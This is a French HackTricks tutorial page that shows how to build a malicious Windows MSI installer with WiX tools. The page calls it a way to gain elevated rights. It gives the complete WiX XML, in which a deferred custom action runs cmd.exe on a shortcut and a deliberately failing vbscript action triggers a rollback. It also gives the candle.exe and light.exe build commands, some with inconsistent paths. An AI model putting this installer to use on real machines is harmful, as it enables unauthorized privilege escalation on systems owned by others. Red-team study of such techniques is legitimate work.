hacktricks/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md

5.6 KiB

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Création d'un MSI malveillant et obtention des droits root

La création de l'installateur MSI sera réalisée en utilisant wixtools, plus précisément wixtools sera utilisé. Il convient de mentionner que d'autres constructeurs MSI ont été testés, mais ils n'ont pas réussi dans ce cas particulier.

Pour une compréhension complète des exemples d'utilisation de MSI wix, il est conseillé de consulter cette page. Ici, vous trouverez divers exemples qui démontrent l'utilisation de MSI wix.

Le but est de générer un MSI qui exécutera le fichier lnk. Pour ce faire, le code XML suivant pourrait être utilisé (xml from here):

<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
</Component>
</Directory>
</Directory>
</Directory>
<Feature Id="DefaultFeature" Level="1">
<ComponentRef Id="ApplicationFiles"/>
</Feature>
<Property Id="cmdline">cmd.exe /C "c:\users\public\desktop\shortcuts\rick.lnk"</Property>
<CustomAction Id="Stage1" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore"
Impersonate="yes"/>
<CustomAction Id="Stage2" Execute="deferred" Script="vbscript" Return="check">
fail_here
</CustomAction>
<InstallExecuteSequence>
<Custom Action="Stage1" After="InstallInitialize"></Custom>
<Custom Action="Stage2" Before="InstallFiles"></Custom>
</InstallExecuteSequence>
</Product>
</Wix>

Il est important de noter que l'élément Package contient des attributs tels que InstallerVersion et Compressed, spécifiant la version de l'installateur et indiquant si le package est compressé ou non, respectivement.

Le processus de création implique l'utilisation de candle.exe, un outil de wixtools, pour générer un objet wix à partir de msi.xml. La commande suivante doit être exécutée :

candle.exe -out C:\tem\wix C:\tmp\Ethereal\msi.xml

De plus, il convient de mentionner qu'une image est fournie dans le message, qui illustre la commande et sa sortie. Vous pouvez vous y référer pour un guide visuel.

De plus, light.exe, un autre outil de wixtools, sera utilisé pour créer le fichier MSI à partir de l'objet wix. La commande à exécuter est la suivante:

light.exe -out C:\tm\Ethereal\rick.msi C:\tmp\wix

Références

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres façons de soutenir HackTricks: